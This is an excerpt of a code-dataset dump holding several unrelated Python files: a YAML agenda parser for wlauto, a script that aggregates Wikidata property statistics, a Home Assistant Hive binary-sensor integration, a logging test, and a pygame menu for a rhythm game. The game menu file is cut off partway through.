id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
270365 | # Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from copy import copy
from collections import OrderedDict, defaultdict
import yaml
from wlauto.exceptions import ConfigError
from wlauto.utils.misc import load_struct_from_yaml, LoadSyntaxError
from wlauto.utils.types import counter, reset_counter
def get_aliased_param(d, aliases, default=None, pop=True):
    """Return the value stored in *d* under whichever of *aliases* is present.

    Raises ConfigError if more than one alias appears in *d*. When ``pop``
    is True (the default) the matched key is removed from *d*; otherwise it
    is left in place. Returns *default* when no alias is present.
    """
    present = [alias for alias in aliases if alias in d]
    if len(present) > 1:
        raise ConfigError('Only one of {} may be specified in a single entry'.format(aliases))
    if not present:
        return default
    key = present[0]
    return d.pop(key) if pop else d[key]
class AgendaEntry(object):
    """Base class for agenda entries; provides dict serialization."""

    def to_dict(self):
        """Return a shallow copy of this entry's attribute dictionary."""
        return dict(self.__dict__)
class AgendaWorkloadEntry(AgendaEntry):
    """
    Specifies execution of a workload, including things like the number of
    iterations, device runtime_parameters configuration, etc.
    """

    def __init__(self, **kwargs):
        super(AgendaWorkloadEntry, self).__init__()
        self.id = kwargs.pop('id')
        # The workload may be named via either 'workload_name' or 'name'.
        self.workload_name = get_aliased_param(kwargs, ['workload_name', 'name'])
        if not self.workload_name:
            raise ConfigError('No workload name specified in entry {}'.format(self.id))
        self.label = kwargs.pop('label', self.workload_name)
        self.number_of_iterations = kwargs.pop('iterations', None)
        self.boot_parameters = get_aliased_param(
            kwargs, ['boot_parameters', 'boot_params'], default=OrderedDict())
        self.runtime_parameters = get_aliased_param(
            kwargs, ['runtime_parameters', 'runtime_params'], default=OrderedDict())
        self.workload_parameters = get_aliased_param(
            kwargs, ['workload_parameters', 'workload_params', 'params'], default=OrderedDict())
        self.instrumentation = kwargs.pop('instrumentation', [])
        self.flash = kwargs.pop('flash', OrderedDict())
        self.classifiers = kwargs.pop('classifiers', OrderedDict())
        # Anything still left in kwargs was not a recognised entry.
        if kwargs:
            raise ConfigError('Invalid entry(ies) in workload {}: {}'.format(self.id, ', '.join(kwargs.keys())))
class AgendaSectionEntry(AgendaEntry):
    """
    A section of an agenda: configuration shared by a group of workloads,
    together with the workload entries that belong to the section.
    """

    def __init__(self, agenda, **kwargs):
        super(AgendaSectionEntry, self).__init__()
        self.id = kwargs.pop('id')
        self.number_of_iterations = kwargs.pop('iterations', None)
        self.boot_parameters = get_aliased_param(
            kwargs, ['boot_parameters', 'boot_params'], default=OrderedDict())
        self.runtime_parameters = get_aliased_param(
            kwargs, ['runtime_parameters', 'runtime_params', 'params'], default=OrderedDict())
        self.workload_parameters = get_aliased_param(
            kwargs, ['workload_parameters', 'workload_params'], default=OrderedDict())
        self.instrumentation = kwargs.pop('instrumentation', [])
        self.flash = kwargs.pop('flash', OrderedDict())
        self.classifiers = kwargs.pop('classifiers', OrderedDict())
        # Parsing of nested workload specs is delegated back to the agenda so
        # that IDs are assigned from the shared pools.
        self.workloads = [agenda.get_workload_entry(w) for w in kwargs.pop('workloads', [])]
        if kwargs:
            raise ConfigError('Invalid entry(ies) in section {}: {}'.format(self.id, ', '.join(kwargs.keys())))

    def to_dict(self):
        """Serialize, recursing into the contained workload entries."""
        d = copy(self.__dict__)
        d['workloads'] = [w.to_dict() for w in self.workloads]
        return d
class AgendaGlobalEntry(AgendaEntry):
    """
    Workload configuration global to all workloads.
    """

    def __init__(self, **kwargs):
        super(AgendaGlobalEntry, self).__init__()
        self.number_of_iterations = kwargs.pop('iterations', None)
        self.boot_parameters = get_aliased_param(
            kwargs, ['boot_parameters', 'boot_params'], default=OrderedDict())
        self.runtime_parameters = get_aliased_param(
            kwargs, ['runtime_parameters', 'runtime_params', 'params'], default=OrderedDict())
        self.workload_parameters = get_aliased_param(
            kwargs, ['workload_parameters', 'workload_params'], default=OrderedDict())
        self.instrumentation = kwargs.pop('instrumentation', [])
        self.flash = kwargs.pop('flash', OrderedDict())
        self.classifiers = kwargs.pop('classifiers', OrderedDict())
        # Any keys still present were not recognised.
        if kwargs:
            raise ConfigError('Invalid entries in global section: {}'.format(kwargs))
class Agenda(object):
    """In-memory representation of a WA agenda.

    Parses a YAML agenda (from a file path, a file-like object, or raw YAML
    text) into ``config``, ``global_``, ``sections`` and ``workloads``
    attributes, assigning unique string IDs to entries as needed.

    NOTE(review): this file uses Python 2 syntax (``except ..., e``,
    ``basestring``, ``iteritems``).
    """

    def __init__(self, source=None):
        # source may be a file path, a file-like object, or YAML text;
        # None creates an empty agenda.
        self.filepath = None
        self.config = {}
        self.global_ = None
        self.sections = []
        self.workloads = []
        # Per-pool ('section' / 'workload') sets of IDs already in use.
        self._seen_ids = defaultdict(set)
        if source:
            try:
                # Restart the automatic ID counters so auto-assigned IDs are
                # stable across loads.
                reset_counter('section')
                reset_counter('workload')
                self._load(source)
            except (ConfigError, LoadSyntaxError, SyntaxError), e:
                raise ConfigError(str(e))

    def add_workload_entry(self, w):
        """Parse *w* and append the resulting entry to ``self.workloads``."""
        entry = self.get_workload_entry(w)
        self.workloads.append(entry)

    def get_workload_entry(self, w):
        """Convert a workload spec (name string or dict) into an AgendaWorkloadEntry."""
        if isinstance(w, basestring):
            # A bare string is shorthand for {'name': <string>}.
            w = {'name': w}
        if not isinstance(w, dict):
            raise ConfigError('Invalid workload entry: "{}" in {}'.format(w, self.filepath))
        self._assign_id_if_needed(w, 'workload')
        return AgendaWorkloadEntry(**w)

    def _load(self, source):  # pylint: disable=too-many-branches
        """Parse *source* and populate config/global_/sections/workloads."""
        try:
            raw = self._load_raw_from_source(source)
        except ValueError as e:
            name = getattr(source, 'name', '')
            raise ConfigError('Error parsing agenda {}: {}'.format(name, e))
        if not isinstance(raw, dict):
            message = '{} does not contain a valid agenda structure; top level must be a dict.'
            raise ConfigError(message.format(self.filepath))
        for k, v in raw.iteritems():
            if v is None:
                raise ConfigError('Empty "{}" entry in {}'.format(k, self.filepath))
            if k == 'config':
                if not isinstance(v, dict):
                    raise ConfigError('Invalid agenda: "config" entry must be a dict')
                self.config = v
            elif k == 'global':
                self.global_ = AgendaGlobalEntry(**v)
            elif k == 'sections':
                # First pass collects all explicitly specified IDs (including
                # those of workloads nested inside sections) so that the
                # second pass cannot auto-assign a colliding ID.
                self._collect_existing_ids(v, 'section')
                for s in v:
                    if not isinstance(s, dict):
                        raise ConfigError('Invalid section entry: "{}" in {}'.format(s, self.filepath))
                    self._collect_existing_ids(s.get('workloads', []), 'workload')
                for s in v:
                    self._assign_id_if_needed(s, 'section')
                    self.sections.append(AgendaSectionEntry(self, **s))
            elif k == 'workloads':
                self._collect_existing_ids(v, 'workload')
                for w in v:
                    self.workloads.append(self.get_workload_entry(w))
            else:
                raise ConfigError('Unexpected agenda entry "{}" in {}'.format(k, self.filepath))

    def _load_raw_from_source(self, source):
        """Load the raw YAML structure from a file object, file path, or YAML text."""
        if hasattr(source, 'read') and hasattr(source, 'name'):  # file-like object
            self.filepath = source.name
            raw = load_struct_from_yaml(text=source.read())
        elif isinstance(source, basestring):
            if os.path.isfile(source):
                self.filepath = source
                raw = load_struct_from_yaml(filepath=self.filepath)
            else:  # assume YAML text
                raw = load_struct_from_yaml(text=source)
        else:
            raise ConfigError('Unknown agenda source: {}'.format(source))
        return raw

    def _collect_existing_ids(self, ds, pool):
        """Record the explicitly specified IDs found in *ds* under *pool*."""
        # Collection needs to take place first so that auto IDs can be
        # correctly assigned, e.g. if someone explicitly specified an ID
        # of '1' for one of the workloads.
        for d in ds:
            if isinstance(d, dict) and 'id' in d:
                did = str(d['id'])
                if did in self._seen_ids[pool]:
                    raise ConfigError('Duplicate {} ID: {}'.format(pool, did))
                self._seen_ids[pool].add(did)

    def _assign_id_if_needed(self, d, pool):
        """Give *d* a unique auto-generated ID if it does not already have one."""
        # Also enforces string IDs
        if d.get('id') is None:
            # Keep drawing from the counter until we find an ID not already
            # claimed by an explicit entry.
            did = str(counter(pool))
            while did in self._seen_ids[pool]:
                did = str(counter(pool))
            d['id'] = did
            self._seen_ids[pool].add(did)
        else:
            d['id'] = str(d['id'])
# Modifying the yaml parser to use an OrderedDict, rather than regular Python
# dict for mappings. This preserves the order in which the items are
# specified. See
# http://stackoverflow.com/a/21048064
_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG
def dict_representer(dumper, data):
    """Represent an OrderedDict as a plain YAML mapping, preserving key order."""
    return dumper.represent_mapping(_mapping_tag, data.iteritems())
def dict_constructor(loader, node):
    """Construct an OrderedDict from a YAML mapping node.

    Raises ValueError when the mapping contains the same key more than once,
    which plain YAML loading would silently collapse.
    """
    result = OrderedDict()
    for key, value in loader.construct_pairs(node):
        if key in result:
            raise ValueError('Duplicate entry: {}'.format(key))
        result[key] = value
    return result
# Install the OrderedDict round-trip hooks into the global yaml module.
yaml.add_representer(OrderedDict, dict_representer)
yaml.add_constructor(_mapping_tag, dict_constructor)
| StarcoderdataPython |
3245829 | import json
# create a list of the extracted properties and combine their facets to them -> using the property_dictionary.json
# .. from the wikidata_research
# .. per timeframe
#
def create_dict_based_on_properties_dict_timeframe_and_Wikidata_property_dict_per_timeframe(location, mode, redundant_mode):
    """Merge per-timeframe property usage counts with Wikidata property metadata.

    Reads the counted-properties statistics for *location* plus the global
    ``property_dictionary.json``, annotates every counted property that exists
    in the dictionary with its facets, label, datatype and reference/qualifier
    information, and records the remaining PIDs as "false" (non-existent)
    properties. The merged result is written to
    ``properties_facets_and_datatypes.json`` in the same statistics directory.

    :param location: path fragment; the first 21 characters are the prefix
        directory and everything from character 23 on is the timeframe
        (character 22 is a separator that is skipped).
    :param mode: ``"qualifier_metadata"`` or ``"reference_metadata"``.
    :param redundant_mode: ``"redundant"`` or ``"non_redundant"``.
    :raises Exception: if *mode* or *redundant_mode* is unsupported.
    """
    if mode not in ("qualifier_metadata", "reference_metadata"):
        # BUG FIX: the original used a comma ("...: ", mode), which built a
        # tuple instead of a string and produced a garbled exception message.
        raise Exception("Not supported mode: {}".format(mode))
    if redundant_mode not in ("redundant", "non_redundant"):
        raise Exception("Not supported redundancy mode: {}".format(redundant_mode))

    result_dict = {
        "real_wikidata_properties": {},
        "total_real_wikidata_property_usages": 0,
        # in case someone used a property, e.g. "P969", which is not a
        # property anywhere to be found in Wikidata
        "false_wikidata_properties": {},
        "total_false_wikidata_property_usages": 0,
        "unique_false_wikidata_property_usages": 0,
    }

    # Both the input statistics and the output live in the same directory.
    base_dir = "data/" + location[:21] + "/" + location[22:] + "/statistical_information/" \
               + redundant_mode + "/" + mode + "/raw_counted_properties/"
    path_to_stat_information = base_dir + "properties_counted.json"
    path_to_wikidata_property_dict = "data/property_dictionary.json"
    with open(path_to_stat_information, "r") as stat_info_file:
        stat_info = json.load(stat_info_file)
    with open(path_to_wikidata_property_dict, "r") as wikidata_props_file:
        wikidata_props = json.load(wikidata_props_file)

    for PID, occurrences in stat_info["properties"].items():
        # NOTE: the property dictionary (extracted from SQID in 2022) is a
        # superset of every property that could have existed when the
        # 2017-2018 queries were made, so a PID missing from it really is an
        # invalid property rather than a later deletion.
        if PID not in wikidata_props:
            result_dict["false_wikidata_properties"][PID] = {"occurrences": occurrences}
            result_dict["total_false_wikidata_property_usages"] += occurrences
            result_dict["unique_false_wikidata_property_usages"] += 1
        else:
            props = wikidata_props[PID]
            result_dict["real_wikidata_properties"][PID] = {
                "occurrences": occurrences,
                "facets": props["facet_of"],
                "label": props["label"],
                "datatype": props["datatype"],
                "is_reference": props["is_reference"],
                "qualifier_class": props["qualifier_class"],
            }
            result_dict["total_real_wikidata_property_usages"] += occurrences

    path_to_output = base_dir + "properties_facets_and_datatypes.json"
    with open(path_to_output, "w") as result_data:
        json.dump(result_dict, result_data)
| StarcoderdataPython |
1845403 | """Support for the Hive binary sensors."""
from datetime import timedelta
from homeassistant.components.binary_sensor import (
DEVICE_CLASS_CONNECTIVITY,
DEVICE_CLASS_MOTION,
DEVICE_CLASS_OPENING,
DEVICE_CLASS_SMOKE,
DEVICE_CLASS_SOUND,
BinarySensorEntity,
)
from . import ATTR_AVAILABLE, ATTR_MODE, DATA_HIVE, DOMAIN, HiveEntity
# Map Hive "hiveType" values to Home Assistant binary-sensor device classes.
DEVICETYPE = {
    "contactsensor": DEVICE_CLASS_OPENING,
    "motionsensor": DEVICE_CLASS_MOTION,
    "Connectivity": DEVICE_CLASS_CONNECTIVITY,
    "SMOKE_CO": DEVICE_CLASS_SMOKE,
    "DOG_BARK": DEVICE_CLASS_SOUND,
    "GLASS_BREAK": DEVICE_CLASS_SOUND,
}

# No limit on concurrent entity updates.
PARALLEL_UPDATES = 0
# Poll the Hive API every 15 seconds.
SCAN_INTERVAL = timedelta(seconds=15)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up the Hive Binary Sensor."""
    if discovery_info is None:
        return
    hive = hass.data[DOMAIN].get(DATA_HIVE)
    devices = hive.devices.get("binary_sensor")
    # Build one entity per discovered binary-sensor device (possibly none).
    entities = []
    if devices:
        entities = [HiveBinarySensorEntity(hive, device) for device in devices]
    async_add_entities(entities, True)
class HiveBinarySensorEntity(HiveEntity, BinarySensorEntity):
    """Representation of a Hive binary sensor."""

    @property
    def unique_id(self):
        """Return unique ID of entity."""
        return self._unique_id

    @property
    def device_info(self):
        """Return device information."""
        return {"identifiers": {(DOMAIN, self.unique_id)}, "name": self.name}

    @property
    def device_class(self):
        """Return the class of this sensor."""
        return DEVICETYPE.get(self.device["hiveType"])

    @property
    def name(self):
        """Return the name of the binary sensor."""
        return self.device["haName"]

    @property
    def available(self):
        """Return if the device is available."""
        # Connectivity sensors are always considered available; everything
        # else mirrors the device's reported online state.
        if self.device["hiveType"] == "Connectivity":
            return True
        return self.device["deviceData"]["online"]

    @property
    def device_state_attributes(self):
        """Show Device Attributes."""
        return {
            ATTR_AVAILABLE: self.attributes.get(ATTR_AVAILABLE),
            ATTR_MODE: self.attributes.get(ATTR_MODE),
        }

    @property
    def is_on(self):
        """Return true if the binary sensor is on."""
        return self.device["status"]["state"]

    async def async_update(self):
        """Update all Node data from Hive."""
        await self.hive.session.updateData(self.device)
        self.device = await self.hive.sensor.get_sensor(self.device)
        self.attributes = self.device.get("attributes", {})
| StarcoderdataPython |
1794800 | from loguru import logger
from bubop import logger, loguru_set_verbosity
def test_loguru_set_verbosity(caplog):
    """Verify loguru_set_verbosity(0) silences subsequent DEBUG messages.

    The first debug message is emitted before the verbosity change and must
    be captured; the second is emitted afterwards and must not be.
    """
    logger.debug("kalimera")
    loguru_set_verbosity(0)
    logger.debug("kalinuxta")
    captured = caplog.text
    assert "kalimera" in captured
    assert "kalinuxta" not in captured
| StarcoderdataPython |
4965273 | from os.path import isfile
from pickle import dump, load
import pygame
from pygame.font import Font
from pygame.time import Clock
from pyperclip import paste
from audio_player import AudioPlayer
from game import Game
from library import Library
from track import Track
from util import ALL_LAYERS, seconds_to_readable_time
class Menu:
    """Top-level menu / screen controller for the RIZUMU rhythm game."""

    # Screen identifiers; indices into self.screen_calls.
    EXIT = 0
    TITLE = 1
    SETTINGS = 2
    TRACK_SELECT = 3
    TRACK_SETUP = 4
    NEW_TRACK = 5
    EDIT_TRACK = 6
    SEARCH = 7

    # UI colors (RGB tuples).
    WHITE = (255, 255, 255)
    GRAY = (128, 128, 128)
    # Per-layer accent colors for layers A-F.
    A_COLOR = (255, 128, 128)
    B_COLOR = (255, 255, 128)
    C_COLOR = (128, 255, 128)
    D_COLOR = (128, 255, 255)
    E_COLOR = (128, 128, 255)
    F_COLOR = (255, 128, 255)
    SELECTED_COLOR = D_COLOR
    ENABLED_COLOR = C_COLOR
    DISABLED_COLOR = A_COLOR
    # Color per integer difficulty bucket (indices 0-8, clamped by callers).
    DIFFICULTY_COLORS = (C_COLOR, C_COLOR, C_COLOR, B_COLOR, B_COLOR, A_COLOR, D_COLOR, E_COLOR, F_COLOR)
    def __init__(self):
        """Initialize pygame, load the saved library, pre-render labels, and start the menu loop."""
        pygame.mixer.pre_init(frequency=44100, size=-16, channels=2)
        pygame.init()
        self.clock = Clock()
        info = pygame.display.Info()
        # Window is 75% of the display width at full display height.
        self.size = self.width, self.height = int(info.current_w * .75), info.current_h
        self.screen = pygame.display.set_mode(self.size, flags=pygame.SCALED | pygame.RESIZABLE, vsync=True)
        pygame.display.set_icon(pygame.image.load('img/icon.png'))
        pygame.display.set_caption('RIZUMU')
        # Restore the persisted track library if present, otherwise start empty.
        if isfile('library/saved.library'):
            self.library = load(open('library/saved.library', 'rb'))
        else:
            self.library = Library()
        pygame.mouse.set_visible(False)
        # Indexed by the Menu.* screen constants.
        self.screen_calls = [self.close_menu,
                             self.draw_menu,
                             self.draw_settings,
                             self.draw_track_select,
                             self.draw_track_setup,
                             self.draw_new_track,
                             self.draw_edit_track,
                             self.draw_search]
        self.delay_time = 2  # Pre-track delay time
        # Audio player
        self.audio_device = 1
        self.audio_player = AudioPlayer(self.delay_time)
        self.audio_player.set_device(self.audio_device)
        self.latency = self.audio_player.device.get_output_latency() * 0
        # In-game options: per-layer [enabled, bound pygame key] pairs.
        self.layers_keys = {'A': [True, None], 'B': [True, None], 'C': [True, None], 'D': [True, None], 'E': [True, None], 'F': [True, None]}
        self.prune_unused_layers = False
        # Difficulty
        self.preview_length = .5
        self.lenience = 0.06  # seconds +/- per beat
        # Fonts
        self.large_font = Font('font/unifont.ttf', 36)
        self.generic_font = Font('font/unifont.ttf', 26)
        self.small_font = Font('font/unifont.ttf', 16)
        # Sound Effects
        self.play_hit_sound = True
        self.bass_hit_sound_data = pygame.mixer.Sound(open('audio/bass.wav', 'rb').read())
        self.high_hit_sound_data = pygame.mixer.Sound(open('audio/high.wav', 'rb').read())
        pygame.mixer.set_num_channels(2)
        # GUI variables
        self.redraw_screen = True
        self.current_screen = Menu.TITLE
        self.last_screen = Menu.TITLE
        self.track_selection_index = 0
        '''
        Main menu screen objects
        '''
        self.main_title = self.large_font.render('RIZUMU', True, Menu.WHITE)
        self.main_title_box = self.main_title.get_rect()
        self.main_title_box.center = self.width / 2, 200
        self.main_play = self.large_font.render('Play', True, Menu.SELECTED_COLOR)
        self.main_play_box = self.main_play.get_rect()
        self.main_play_box.center = self.width / 2, 400
        self.main_settings = self.large_font.render(f'Settings', True, Menu.WHITE)
        self.main_settings_box = self.main_settings.get_rect()
        self.main_settings_box.center = self.width / 2, 500
        '''
        Settings screen objects
        '''
        '''
        Track select screen objects
        '''
        # Seven-track window around the current selection (index 3 is the
        # highlighted track).
        self.selected_tracks = self.library.get_tracks(self.track_selection_index)
        self.select_track_0 = None
        self.select_track_1 = None
        self.select_track_2 = None
        self.select_track_3 = None
        self.select_track_4 = None
        self.select_track_5 = None
        self.select_track_6 = None
        self.render_selected_tracks()
        self.select_track_title = None
        self.select_track_artist = None
        self.select_track_album = None
        self.select_track_high_score = None
        self.select_track_high_score_accuracy = None
        self.select_track_high_score_layers = None
        self.select_track_duration = None
        self.select_track_difficulty = None
        self.select_track_num_beats_A = None
        self.select_track_num_beats_B = None
        self.select_track_num_beats_C = None
        self.select_track_num_beats_D = None
        self.select_track_num_beats_E = None
        self.select_track_num_beats_F = None
        self.render_selected_track_data()
        self.select_edit = self.generic_font.render('e: Edit', True, Menu.WHITE)
        self.select_new = self.generic_font.render('n: New', True, Menu.WHITE)
        self.select_back = self.generic_font.render('⌫ : Back', True, Menu.WHITE)
        self.select_play = self.generic_font.render('⏎ : Play', True, Menu.WHITE)
        '''
        Track setup screen objects
        '''
        self.setup_toggle = self.generic_font.render('⏎ : Select/Toggle', True, Menu.WHITE)
        self.setup_back = self.select_back
        '''
        New track screen objects
        '''
        self.new_track_edit = self.generic_font.render('⏎ : Paste from clipboard', True, Menu.WHITE)
        self.new_track_save = self.generic_font.render('s: Save', True, Menu.WHITE)
        self.new_track_cancel = self.generic_font.render('⌫ : Cancel', True, Menu.WHITE)
        '''
        Edit track screen objects
        '''
        self.edit_track_delete = self.generic_font.render('d: Delete', True, Menu.WHITE)
        '''
        Search track screen objects
        '''
        # Start drawing
        self.display_loop()
def render_selected_tracks(self):
def get_color(track):
if not track:
return Menu.WHITE
else:
return Menu.DIFFICULTY_COLORS[min(8, int(track.difficulty))]
self.select_track_0 = self.generic_font.render(f'{self.selected_tracks[0]}', True, get_color(self.selected_tracks[0]))
self.select_track_1 = self.generic_font.render(f'{self.selected_tracks[1]}', True, get_color(self.selected_tracks[1]))
self.select_track_2 = self.generic_font.render(f'{self.selected_tracks[2]}', True, get_color(self.selected_tracks[2]))
self.select_track_3 = self.generic_font.render(f'{self.selected_tracks[3]}', True, get_color(self.selected_tracks[3]))
self.select_track_4 = self.generic_font.render(f'{self.selected_tracks[4]}', True, get_color(self.selected_tracks[4]))
self.select_track_5 = self.generic_font.render(f'{self.selected_tracks[5]}', True, get_color(self.selected_tracks[5]))
self.select_track_6 = self.generic_font.render(f'{self.selected_tracks[6]}', True, get_color(self.selected_tracks[6]))
def render_selected_track_data(self):
if self.selected_tracks[3]:
color = Menu.DIFFICULTY_COLORS[min(8, int(self.selected_tracks[3].difficulty))]
self.select_track_title = self.large_font.render(f'{self.selected_tracks[3].title}', True, color)
self.select_track_artist = self.generic_font.render(f'{self.selected_tracks[3].artist}', True, Menu.WHITE)
self.select_track_album = self.generic_font.render(f'{self.selected_tracks[3].album}', True, Menu.WHITE)
self.select_track_high_score = self.generic_font.render(f'High Score: {self.selected_tracks[3].high_score}', True, Menu.WHITE)
self.select_track_high_score_accuracy = self.generic_font.render(f'{self.selected_tracks[3].high_score_accuracy:.3f}%', True, Menu.WHITE)
self.select_track_high_score_layers = self.generic_font.render(f'{self.selected_tracks[3].high_score_layers}', True, Menu.WHITE)
self.select_track_duration = self.generic_font.render(f'{seconds_to_readable_time(self.selected_tracks[3].duration)}', True, Menu.WHITE)
self.select_track_difficulty = self.generic_font.render(f'Difficulty: {self.selected_tracks[3].difficulty}', True, color)
self.select_track_num_beats_A = self.generic_font.render(f'{self.selected_tracks[3].num_beats["A"]}', True, Menu.A_COLOR)
self.select_track_num_beats_B = self.generic_font.render(f'{self.selected_tracks[3].num_beats["B"]}', True, Menu.B_COLOR)
self.select_track_num_beats_C = self.generic_font.render(f'{self.selected_tracks[3].num_beats["C"]}', True, Menu.C_COLOR)
self.select_track_num_beats_D = self.generic_font.render(f'{self.selected_tracks[3].num_beats["D"]}', True, Menu.D_COLOR)
self.select_track_num_beats_E = self.generic_font.render(f'{self.selected_tracks[3].num_beats["E"]}', True, Menu.E_COLOR)
self.select_track_num_beats_F = self.generic_font.render(f'{self.selected_tracks[3].num_beats["F"]}', True, Menu.F_COLOR)
    def draw_menu(self):
        """Title screen loop: arrow keys move between Play / Settings, Enter selects."""
        label_selection_index = 0  # 0 = Play, 1 = Settings
        while 1:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    self.current_screen = Menu.EXIT
                    return
                elif event.type == pygame.KEYDOWN:
                    self.redraw_screen = True
                    if event.key == pygame.K_UP:
                        # Highlight 'Play'.
                        self.main_play = self.large_font.render('Play', True, Menu.SELECTED_COLOR)
                        self.main_settings = self.large_font.render(f'Settings', True, Menu.WHITE)
                        label_selection_index = 0
                    elif event.key == pygame.K_DOWN:
                        # Highlight 'Settings'.
                        self.main_play = self.large_font.render('Play', True, Menu.WHITE)
                        self.main_settings = self.large_font.render(f'Settings', True, Menu.SELECTED_COLOR)
                        label_selection_index = 1
                    elif event.key == pygame.K_RETURN:
                        if label_selection_index == 0:
                            self.current_screen = Menu.TRACK_SELECT
                        elif label_selection_index == 1:
                            self.current_screen = Menu.SETTINGS
                        return
                    elif event.key == pygame.K_BACKSPACE:
                        self.current_screen = Menu.EXIT
                        return
            # Only repaint when something changed.
            if self.redraw_screen:
                self.redraw_screen = False
                self.screen.fill((0, 0, 0))
                self.screen.blit(self.main_title, self.main_title_box)
                self.screen.blit(self.main_play, self.main_play_box)
                self.screen.blit(self.main_settings, self.main_settings_box)
                pygame.display.flip()
            self.clock.tick(30)
    def draw_settings(self):
        """Settings screen (not yet implemented)."""
        pass
    # noinspection PyArgumentList
    def draw_track_select(self):
        """Track list screen: scroll the library and open setup/edit/new screens."""
        # Enable hold-to-repeat so the library can be scrolled quickly.
        pygame.key.set_repeat(250, 20)
        while 1:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    self.current_screen = Menu.EXIT
                    return
                elif event.type == pygame.KEYDOWN:
                    self.redraw_screen = True
                    if event.key == pygame.K_UP:
                        # Move selection up (clamped) and re-render the window.
                        self.track_selection_index = max(self.track_selection_index - 1, 0)
                        self.selected_tracks = self.library.get_tracks(self.track_selection_index)
                        self.render_selected_tracks()
                        self.render_selected_track_data()
                    elif event.key == pygame.K_DOWN:
                        # Move selection down (clamped) and re-render the window.
                        self.track_selection_index = min(self.track_selection_index + 1, len(self.library.saved_tracks) - 1)
                        self.selected_tracks = self.library.get_tracks(self.track_selection_index)
                        self.render_selected_tracks()
                        self.render_selected_track_data()
                    else:
                        if event.key == pygame.K_RETURN:
                            self.current_screen = Menu.TRACK_SETUP
                            return
                        elif event.key == pygame.K_BACKSPACE:
                            self.current_screen = Menu.TITLE
                            return
                        elif event.key == pygame.K_e:
                            self.current_screen = Menu.EDIT_TRACK
                            return
                        elif event.key == pygame.K_n:
                            self.current_screen = Menu.NEW_TRACK
                            return
            if self.redraw_screen:
                self.redraw_screen = False
                self.screen.fill((0, 0, 0))
                # Box around the highlighted (middle) row and a divider above
                # the detail panel.
                pygame.draw.rect(self.screen, Menu.GRAY, (15, 220, self.width - 30, 60), 1)
                pygame.draw.line(self.screen, Menu.GRAY, (0, 500), (self.width, 500))
                self.screen.blit(self.select_track_0, (15, 30))
                self.screen.blit(self.select_track_1, (30, 100))
                self.screen.blit(self.select_track_2, (45, 170))
                select_track_3_text_box = self.select_track_3.get_rect()
                select_track_3_text_box.center = 0, 250
                self.screen.blit(self.select_track_3, (60, select_track_3_text_box[1]))
                self.screen.blit(self.select_track_4, (45, 310))
                self.screen.blit(self.select_track_5, (30, 380))
                self.screen.blit(self.select_track_6, (15, 450))
                self.screen.blit(self.select_edit, (15, self.height - 30))
                self.screen.blit(self.select_new, (165, self.height - 30))
                self.screen.blit(self.select_back, (self.width - 300, self.height - 30))
                self.screen.blit(self.select_play, (self.width - 150, self.height - 30))
                # Detail panel only when a real track is highlighted.
                if self.selected_tracks[3]:
                    self.screen.blit(self.select_track_title, (15, 525))
                    self.screen.blit(self.select_track_artist, (15, 600))
                    self.screen.blit(self.select_track_album, (15, 650))
                    self.screen.blit(self.select_track_high_score, (15, 700))
                    self.screen.blit(self.select_track_high_score_accuracy, (self.width * .3, 700))
                    self.screen.blit(self.select_track_high_score_layers, (self.width * .45, 700))
                    self.screen.blit(self.select_track_difficulty, (15, 750))
                    self.screen.blit(self.select_track_num_beats_A, (15, 800))
                    self.screen.blit(self.select_track_num_beats_B, (90, 800))
                    self.screen.blit(self.select_track_num_beats_C, (165, 800))
                    self.screen.blit(self.select_track_num_beats_D, (240, 800))
                    self.screen.blit(self.select_track_num_beats_E, (315, 800))
                    self.screen.blit(self.select_track_num_beats_F, (390, 800))
                    self.screen.blit(self.select_track_duration, (500, 800))
                pygame.display.flip()
            self.clock.tick(60)
def draw_track_setup(self):
label_selection_index = 0
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.current_screen = Menu.EXIT
return
elif event.type == pygame.KEYDOWN:
self.redraw_screen = True
if event.key == pygame.K_RETURN:
if label_selection_index == 0:
pygame.key.set_repeat()
self.play_track(self.selected_tracks[3])
self.current_screen = Menu.TRACK_SELECT
return
elif label_selection_index == 1:
# toggle prune unused layers
self.prune_unused_layers = not self.prune_unused_layers
else:
# toggle enable for key
self.layers_keys[ALL_LAYERS[label_selection_index - 2]][0] = not self.layers_keys[ALL_LAYERS[label_selection_index - 2]][0]
elif event.key == pygame.K_BACKSPACE:
self.current_screen = Menu.TRACK_SELECT
return
elif event.key == pygame.K_DOWN:
label_selection_index = min(7, label_selection_index + 1)
break
elif event.key == pygame.K_UP:
label_selection_index = max(0, label_selection_index - 1)
break
elif event.key != pygame.K_ESCAPE and event.key != pygame.K_SPACE:
if label_selection_index >= 2:
for key, value in self.layers_keys.items():
if value[1] == event.key:
self.layers_keys[key][1] = None
self.layers_keys[ALL_LAYERS[label_selection_index - 2]][1] = event.key
if self.redraw_screen:
self.redraw_screen = False
self.screen.fill((0, 0, 0))
start_label = self.large_font.render('START', True, Menu.SELECTED_COLOR if label_selection_index == 0 else Menu.WHITE)
start_label_text_box = start_label.get_rect()
start_label_text_box.center = self.width / 2, 200
self.screen.blit(start_label, start_label_text_box)
prune_unused_layers_label = self.generic_font.render('Prune unused layers:', True, Menu.SELECTED_COLOR if label_selection_index == 1 else Menu.WHITE)
prune_unused_layers_enabled_label = self.generic_font.render(f'{self.prune_unused_layers}',
True, Menu.ENABLED_COLOR if self.prune_unused_layers else Menu.DISABLED_COLOR)
self.screen.blit(prune_unused_layers_label, (25, 275))
self.screen.blit(prune_unused_layers_enabled_label, (325, 275))
# A layer
A_label = self.generic_font.render('Layer A:', True, Menu.SELECTED_COLOR if label_selection_index == 2 else Menu.WHITE)
A_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["A"][0] else "Disabled"}',
